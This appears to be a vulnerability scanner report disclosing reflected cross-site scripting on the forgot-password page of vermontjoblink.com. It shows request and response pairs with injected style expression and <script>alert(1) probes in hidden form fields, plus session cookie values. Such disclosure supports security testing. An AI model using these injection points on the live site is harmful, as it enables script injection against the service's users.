| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="FORMNAME_prev" value="Form0ed897"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 283 usvuserid=&usvuserid |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:55'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="formname_error" value="Form02bbf0"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... 53Cli%253EPlease%2520fill |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:05 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:09:05'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="old_choice" value="2dca44"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... prev=usvuserid&LIBRARY |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:59'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="rand" value="19021c8a7"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... 520the%2520username |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:10 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:09:10'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="securitysys" value="onde510"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 283 usvuserid=&usvuserid |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:35 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:35'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="u_name_error" value="yesdaaf8"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:48'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="bltextboxextra ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:06 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="BLTEXTBOXEXTRA ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:43 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:43'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="cftextboxextra ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:03 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="CFTEXTBOXEXTRA ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 613 usvuserid=&usvuserid ...[SNIP]... |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:39 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:39'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="old_choice" value="2b2035"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:22 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="ERRORFIELDS_prev" value="usvuseridd074f"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="FORMID_prev" value="47,1098f22"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:19:22 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <a href="/ada/mn_forgotpass ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:24 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="FORMNAME_prev" value="Form0799ac"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:52 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... </li> fa763<script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="LIBRARY_ERRORM ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| POST /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf Content-Length: 283 usvuserid=&usvuserid |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Pragma: no-cache Expires: {ts '2011-04-29 17:08:29'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate <table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{ ...[SNIP]... <input type="hidden" name="old_choice_error" value="28b86e"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="OLD_CHOICE_prev" value="267674"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
| GET /ada/mn_forgotpass.cfm Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontj Cache-Control: max-age=0 Origin: https://www.vermontj User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf |
| HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:33 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org PICS-Label: (PICS-1.1 "http://www.rsac.org Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf Content-Type: text/html; charset=UTF-8 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR ...[SNIP]... <input type="hidden" name="RAND_prev" value="340991,190249ec8"style="x:expression ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | https://www.vermontj |
| Path: | /ada/mn_forgotpass.cfm |
